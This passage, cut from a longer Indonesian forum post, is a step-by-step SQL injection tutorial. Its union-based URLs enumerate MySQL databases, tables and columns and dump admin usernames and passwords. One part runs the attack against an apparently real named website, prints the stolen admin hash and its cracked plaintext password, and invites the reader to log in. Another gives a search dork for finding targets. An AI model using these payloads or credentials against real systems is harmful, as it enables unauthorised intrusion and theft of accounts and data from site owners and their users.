dengan “group_concat(schema_name)” dan juga ditambahkan “+ from+information_schema.schemata–” sesudah nomor kolom terakhir di table database.
Seperti ini contoh URLnya:

Code:

http://www.example.com/index.php?id=-3+UNION+SELECT+group_concat(schema_name),2,3,4,5,6,7+ from+information_schema.schemata--

Hal tersebut akan menunjukkan daftar nama database. Sekarang untuk menemukan database mana yang saat ini dipakai adalah dengan mengganti “group_concat(schema_name)” dengan concat(database()) dan hapus “+ from+information_schema.schemata
Jadi URL nya akan menjadi seperti ini:
Code:

http://www.example.com/index.php?id=-3+UNION+SELECT+concat(database()),2,3,4,5,6,7--

Selamat, anda telah mendapatkan informasi database yang saat ini digunakan.
Menemukan Nama Table

Untuk mengetahui nama table yang digunakan dalam database, anda harus mengganti “concat(database())” dengan group_concat(table_name) dan tambahkan “from information_schema.tables where table_schema=database()” diantara nomor awal dan “–” hapus juga tanda “+” dari “union select“.
Urlnya akan tampak seperti berikut:
Code:

http://www.example.com/index.php?id=-3 union select group_concat(table_name),2,3,4,5,6,7 from information_schema.tables where table_schema=database()--

Nah, hal tersebut akan menampilkan nama table yang digunakan di database.
Menemukan Nama Kolom

Lakukan dengan hanya merubah “table_name” ke “column_name” dan “information_schema.tables” ke “information_schema.columns”.
Url akan tampak seperti ini:

Code:

http://www.example.com/index.php?id=-3 union select group_concat(column_name),2,3,4,5,6,7 from information_schema.columns where table_schema=database()--

Hal tersebut akan memunculkan nama table.
Misalkan nama colom seperti berikut:
admin_username
admin_password

Mengambil Informasi Database
Sekarang kita sudah mengetahui “database name, table names, dan colomn names”, kita bisa menyatukannya bersama-sama dan mengeluarkan informasi yang ada di sana, kita lakukan dengan contoh berikut:
Code:

http://www.example.com/index.php?id=-3 union select 1,group_concat(Columnname,0x3a,columnname,0x3a),2,3,4,5,6,7 from databasename.tablename--

Sekarang ganti “columnname” dengan kolom yang anda mau ambil informasinta. “0x3a” akan membuat jeda diantara informasi yang anda dapatkan dari masing-masing colom. Jangan lupa juga untuk merubah “databasename.tablename” dengan database dan nama tabel dimana kolom ada di database dan tabel tersebut.
Sebagai contoh:
Code:

http://www.example.com/index.php?id=-3 union select 1,group_concat(admin_username,0x3a,admin_password,0x3a),2,3,4,5,6,7 from whippit.t_admin--

Sekarang anda akan mendapatkan informasi username & database
Credit: Madun & Diperbaiki Oleh BinusHacker Team

PART 2

Mari kita coba praktekkan cara diatas!
Sebagai contoh kita mendapatkan target sebagai berikut:
Code:
1
http://www.cocobod.gh/news_details.php?id=30
Sekarang kita akan melakukan pengecekan apakah website tersebut memiliki vulnerability dengan menambahkan tanda di akhir URL, contohnya sebagai berikut:
Code:

1
http://www.cocobod.gh/news_details.php?id=30'
Jika kita menemukan error, maka terdapat vulnerability di website tersebut, sebagai contoh:

Setelah kita mengetahui ada vulnerability, maka langkah selanjutkan adalah kita harus mengetahui berapa jumlah kolom yang ada di table tersebut.

Kita akan mengetahuinya sampai ada informasi “Unknown Column“.
Lakukan pengecekan dengan menggunakan perintah “order by“.
Kita akan mencoba dari 1……..tak hingga, jadi bisa saja 1,2,3,4,5,6,7,dst.
Kebetulah dalam target ini hanya terdapat 7 kolom dalam table yang ada di database,
Contohnya:

Langkah pengetesannya adalah

Code:

1
2
3
4
5
6
7
8
http://www.cocobod.gh/news_details.php?id=30 order by 1-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 2-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 3-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 4-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 5-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 6-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 7-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 8-- >> Unknown column

http://www.cocobod.gh/news_details.php?id=30 order by 8– *>> Unknown column
Hal tersebut membuktikan bahwa tidak ada kolom ke 8 dalam table tersebut, jadi cuman ada 7 kolom.

Langkah selanjutnya adalah, mencari kolom yang dapat di akses!

Kita sudah mengetahui, jumlah kolom adalah 7, kita gunakan perintah “UNION SELECT number,of,columns–” untuk mengatahui kolom mana yang dapat di akses:
Code:



1
<strong>http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,6,7--</strong>



Muncul 6, 2, 3 kan? Kolom dalam tersebutlah yang bisa anda akses dan anda ambil informasinya.


Langkah selanjutnya, mencari informasi versi database


SQL Injection bekerja baik pada versi 5.* ke atas, untuk mendapatkan informasi database version, kita masukkan saja “@@version”, pada kolom dimana saja yang bisa dipakai.
Misalkan kolom “6″ kita ganti dengan “@@version”



Code:

1
<strong>http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,@@version,7--</strong>



Akan muncul versi database 5.1.39, ini berarti database bisa di inject :)

Mengetahui Database Name


Langsung ajah kita replace kolom yang tadi digunakan “6,2,3″ dibagian mana saja, kita gunakan kolom “6″, kita ganti dengan code berikut “group_concat(schema_name)” , dan jangan lupa tambahkan “from information_schema.schemata–” sesudah kolom terakhir.

Code:


1
http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,group_concat(schema_name),7 from information_schema.schemata--

Mengatahui Database Yang Dipakai
Langsung ajah ganti “group_concat(schema_name)” dengan “concat(database())” seperti contoh berikut:
Code:
1
http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,concat(database()),7 from information_schema.schemata--

Selamat, anda telah mengetahui database yang dipakai saat ini adalah “cocobod_gh“.
Mengetahui Nama Tabel

Langsung aja ganti “group_concat(table_name)” dan tambahkan “from information_schema.tables where table_schema=database()–” setelah kolom terakhir.
Code:
1
http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,group_concat(table_name),7 from information_schema.tables where table_schema=database()--

Mengatahui Nama Kolom

Untuk mengetahui nama kolom, kita gunakan query berikut:
group_concat(column_name)
from information_schema.columns where table_schema=database()–

Code:
1
http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,group_concat(column_name),7 from information_schema.columns where table_schema=database()--

Mengambil Informasi Yang Ada Di Dalam Kolom

Ini adalah step akhir, dimana anda akan mendapatkan informasi mengenai isi dari kolom yang berada dalam table di database.
Eksekusi perintah berikut:

Code:
1
http://www.site.com/news_details.php?id=30 union select 1,2,3,4,5,group_concat(columusername,0x3a,columnpassword),7 from currentdb.tableused--
Exploit akan menjadi seperti berikut :
Code:
1
http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,group_concat(username,0x3a,password),7 from cocobod_gh.coc_admin--

Dari informasi di atas kita mendapatkan data: “comaster:2c39e3769d300f7e23f8a9e1e21773e7 ,
Silakan check ke MD5 decrypter untuk mendecrypt password -> http://www.md5decrypter.co.uk/ paste MD5 password yang tadi yaitu: “2c39e3769d300f7e23f8a9e1e21773e7“, anda akan medapatkan result seperti dibawah:


comaster:2c39e3769d300f7e23f8a9e1e21773e7
comaster:cocoadmin4682

username : comaster
password :
cocoadmin4682

Selamat, anda sudah bisa login ke page dengan user & password di atas :)

0 .:. SQL INJECTION V5 .:.

.:. SQL INJECTION V5 .:.
Pengertian sql injection:
SQL injection adalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi clien dan juga merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.

============

Yang perlu di ketahui sebelum sql injection pada mysql:

karakter: ‘,-

comments: /*,–
information_schema untuk versi: mysql versi 5.x , tidak support untuk mysql versi 4.x
allinurl:news.php?newsid=

============

=step Satu:=
============

carilah target

misal: [site]/berita.php?id=100

Tambahkan karakter ‘ pada akhir url atau menambahkan karakter “-” untuk melihat apakah ada pesan error.

contoh: [site]/berita.php?id=100′ atau
[site]/berita.php?id=-100

===========

=step Dua:=
===========

mencari dan menghitung jumlah table yang ada dalam databasenya…

gunakan perintah : order by

contoh: [site]/berita.php?id=-100+order+by+1– atau

[site]/berita.php?id=-100+order+by+1/*

ceklah secara step by step…

misal: [site]/berita.php?id=-100+order+by+1–
[site]/berita.php?id=-100+order+by+2–
[site]/berita.php?id=-100+order+by+3–
[site]/berita.php?id=-100+order+by+4–

sehingga muncul error atau hilang pesan error…

misal: [site]/berita.php?id=-100+order+by+9–

berarti yang kita ambil adalah sampai angka 8

menjadi [site]/berita.php?id=-100+order+by+8–

============

=step Tiga:=
============

untuk mengeluarkan angka berapa yang muncul gunakan perintah union

karena tadi error sampai angka 9
maka: [site]/berita.php?id=-100+union+select+1,2,3,4,5,6,7,8–

ok seumpama yg keluar angka 5


gunakan perintah version() atau @@version untuk mengecek versi sql yg diapakai masukan perintah tsb pada nagka yg keluar tadi

misal: [site]/berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8– atau
[site]/berita.php?id=-100+union+select+1,2,3,4,@@version,6,7,8–

lihat versi yg digunakan seumpama versi 4 tinggalkan saja karena dalam ver 4 ini kita harus menebak sendiri table n column yg ada pada web tersebut karena tidak bisa menggunakan perintah From+Information_schema..


untuk versi 5 berarti anda beruntung tak perlu menebak table n column seperti ver 4 karena di ver 5 ini bisa menggunakan perintah From+Information_schema..


=============

=step Empat:=
=============

untuk menampilkan table yg ada pada web tsb adalah

perintah table_name >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables/* >>> dimasukan setelah angka terakhir

[site]/berita.php?id=-100+union+select+1,2,3,4,table_name,6,7,8+from+information_schema.tables–


seumpama table yang muncul adalah “admin”


============

=step Lima:=
============

untuk menampilkan semua isi dari table tsb adalah

perintah group_concat(table_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables+where+table_schema=database() >>> dimasukan setelah angka terakhir

[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(table_name) ,6,7,8+from+information_schema.tables+where+table_schema=database()–


==============

= step Enam: =
==============

perintah group_concat(column_name) >>> dimasukan pada angka yg keluar tadi

perintah +from+information_schema.columns+where+table_name=0xhexa– >>> dimasukan setelah angka terakhir

[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema ​.columns+where+table_name=0xhexa–


pada tahap ini kamu wajib mengextrak kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinya

website yg digunakan untuk konversi :http://piclist.com/techref/ascii.htm

http://www.industrialtrainer.com/Unicode.shtm


http://www.dolcevie.com/js/converter.html


http://centricle.com/tools/ascii-hex/
[dan lain sebagainya]

contoh kata yg ingin di konversi yaitu admin maka akan menjadi 61646D696E


[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema ​.columns+where+table_name=0x61646D696E–


=============

=step Tujuh:=
=============

memunculkan apa yg tadi telah dikeluarkan dari table yaitu dengan cara


perintah concat_ws(0x3a,hasil isi column yg mau dikeluarkan) >>> dimasukan pada angka yg keluar tadi

perintah +from+(nama table berasal) >>> dimasukan setelah angka terakhir

[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,hasil isi column),6,7,8+from+(nama table berasal)–


contoh kata yang keluar adalah id,username,password


[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,id,username,password),6,7,8+from+admin–


===============

=step Delapan:=
===============

tahap terakhir mencari halam admin atau login


selanjutnya terserah anda karena kekuasaan web ada di tangan anda…


SEMOGA Bermanfaat !!

Jangan Lupa Daftar Di Forum
http://forum.yosepcyber4rt.tk/ :D

The Best Forums | Komunitas Muda Cyber Indonesia | It's 4ll For You !